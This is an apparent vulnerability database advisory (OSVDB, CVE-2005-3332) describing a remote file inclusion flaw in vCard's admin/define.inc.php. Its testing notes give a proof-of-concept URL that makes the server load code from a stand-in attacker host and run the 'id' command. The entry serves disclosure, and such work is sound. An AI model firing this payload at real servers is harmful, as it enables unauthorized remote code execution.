vCard define.inc.php match Variable Remote File Inclusion

2005-10-25T03:52:58
ID OSVDB:20699
Type osvdb
Reporter OSVDB
Modified 2005-10-25T03:52:58

Description

Manual Testing Notes

http://[target]/vCard/admin/define.inc.php?match=http://[attacker]/cmd.gif?&cmd=id

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0347.html CVE-2005-3332 Bugtraq ID: 15207